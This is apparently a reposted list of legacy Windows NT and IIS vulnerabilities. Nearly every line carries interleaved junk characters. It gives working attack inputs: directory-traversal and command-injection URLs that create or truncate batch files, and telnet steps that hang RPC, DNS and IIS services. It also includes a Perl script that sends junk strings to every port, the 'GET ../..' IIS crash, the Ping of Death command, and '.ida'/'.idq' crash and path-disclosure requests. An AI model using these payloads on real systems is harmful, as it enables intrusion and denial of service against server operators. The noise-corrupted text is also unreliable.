受影響系統(tǒng):4.0,iis 1.0
6 f# k# {4 ]8 [+ iA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
" `9 Q" i9 J; k+ T! R* a" f# F" e9 v7 s% o
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
4 M; o0 ]7 z8 p h* V
: F- D& }& Q# r9 C: }By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
% t8 n6 A. u, y$ ^% c) I3 F% m- B5 F% e) q
--------------------------------------------------------------------% ~& I; L: T% y+ x5 M
! ^- ?& p+ I/ v. ]" [7 d% E8 H3 U- w8 |( Y
受影響系統(tǒng):4.0- V( R* O% P: T( V
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
6 M* z* Z: ]* ?0 l- R
9 r! A* x, [1 U/ F6 @- h7 {If the file 'target.bat' exists, the file will be truncated.& M7 b2 D2 |6 W# Q1 s. k3 U- s, m
( h" P6 u8 ^: P
. z/ _" v- l# l" C* g2 f8 O* B
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.6 W1 P7 E; Q+ v- R! ?
: J, v5 k8 R! x% r$ P2 D* z; B
----------------------------------------------------------------------
8 K; ^7 x7 D" s6 d2 M
( z; h! J9 o# F& X受影響系統(tǒng):3.51,4.08 f. x* t% p0 Q0 g, q3 A; f
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
0 F+ W r+ {5 I' A0 x4 J
' {2 V& v6 H( lThe following steps;
5 h- K( U! W0 t; f9 `: Y: j8 w
7 h/ s, G9 T& ~Telnet to an NT 4.0 system on port 135
) W5 \# z- D) @9 V. NType about 10 characters followed by a <CR> / a& O: i4 |- Z- s
Exit Telnet % _4 s1 j' K j" q! P/ d
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
$ O0 W K; c# a# S! I+ r* z6 W1 m- X
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.0 H6 b/ x0 q: \/ G. M* n0 z
' F: c" _2 r$ R/ c# f& \
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.; w6 e. |# x/ [! ], s* |0 x
& ^& u9 A/ m4 t; oIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.4 I$ p/ E' X+ o! B& |* t
0 `+ H, u# x4 n, }! S/ R( i# X0 o# U4 L
The following is modified perl script gleaned from postings in the [email protected] list to test ports on your system (Perl is available from the NT resource kit):8 W0 a+ F6 k" E3 P A4 g3 M! k
- w4 w1 I' v3 a1 z3 v8 c7 t) M
/*begin poke code*/) v9 E: h* i: D, D0 X4 ^, G6 Q
0 G1 P* ~3 Q* \+ @! ?7 W
use Socket;7 W: M8 R1 H+ x+ `# S( Z) q0 E
use FileHandle;
8 j; K2 ~7 }+ `2 O1 J; Srequire "chat2.pl";
3 i6 F2 m9 A/ b& p+ V1 ]/ }/ d) Y* ?! {$ {" n
$systemname = $ARGV[0] && shift;
' g; h7 \1 j: N- H: B5 J9 [# A! p" Z8 Z. {+ p4 Y, \
$verbose = 1; # tell me what you're hitting, Q% ~4 d$ ~/ c0 \4 u
$knownports = 1; # don't hit known problem ports
}2 W% }: G9 U% H! Y( U/ gfor ($port = $0; $port<65535; $port++) - ] L$ n1 b* [/ _$ X: k) I
{/ U: m: F/ C' y& k5 J( K1 q. N
% c4 S% D; R! W% r" Q9 Z
1 y d, E8 A# X7 I
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {. Q3 Q- N- m+ F' ]7 p5 u, G! ?
next;
$ p, ]! V5 L2 K* O0 J}# f0 d& _0 V0 x+ ^
$fh = chat::open_port($systemname, $port);, Z$ E) [1 n& a7 z* F
chat::print ($fh,"This is about ten characters or more");
$ V1 D W/ ^8 s- ~7 x i4 @if ($verbose) {
# e+ P% l" \. l2 I& T, bprint "Trying port: $port\n";* t% x, u$ P% L, |
}
/ C3 _/ c% B; A1 Y+ n9 p: Ichat::close($fh);
9 N/ x2 ?' V8 j4 ~! Z. M, I# [* I1 d& W% @
}/ P2 L9 k8 @0 B; D+ p
" K. g! m$ `& W; e! t- H7 A+ }' X+ _ g, M" z, B2 h3 z
/*end poke code*/% r2 }9 ^8 P5 P1 f; l L; T
) P5 T3 O: W3 C$ e$ J
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername- S9 j4 I/ u5 c# B. y& I7 `# l4 v
! F3 o6 H. }( B% u' \1 }
--------------------------------------------------------------------------------! e( S$ Q8 v5 R1 F8 p
# Y) C8 ?& R- u, I: P受影響系統(tǒng):4.07 t0 _1 |( l* B
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
8 f0 e9 ^* A* ]& V/ C$ q$ ^( ]0 i5 P6 ~0 g; J7 o5 N
This attack causes Dr. Watson to display an alert window and to log an error:
0 F3 c% @9 h3 I0 }* j6 x n6 p v
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
( T" |, R3 x2 a; S
6 `/ e5 \! @4 v( q5 X8 f, I--------------------------------------------------------------------------------! j+ N7 C5 k3 |$ d
) i+ k6 i! y. j' Z! y7 X( J* b' J* q
受影響系統(tǒng):3.51,4.0. L' C j/ v8 @
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:/ w) n7 l, j: _# k$ L! [
5 m. H l+ K% y/ e" [$ ^- t
STOP: 0X0000001E; p: L$ d( `6 ]' r! b8 M
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS! _1 l: c1 F9 i
0 B# P7 _/ l1 x# T t+ h
-OR-, V. S& F- ? {9 k
& ]* m: G$ m, F3 aSTOP: 0x0000000A
# `) n C# w- N( aIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
! H! E# J% ]: p/ m) S" Z$ G9 S+ c0 D- W; o/ G3 M0 c
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.+ o0 B: H# v# Y& h( ?; S
. K+ z' j( ?5 |4 H--------------------------------------------------------------------------------6 `! s9 ?/ w5 y8 O5 {
, f* l$ E7 |5 |! SMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). " e4 F n. r) }
) g* z) {) f; B; o% ?2 u--------------------------------------------------------
: Z3 X7 R( h' |5 y
/ P. h x& g- J, H6 M7 I+ |IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |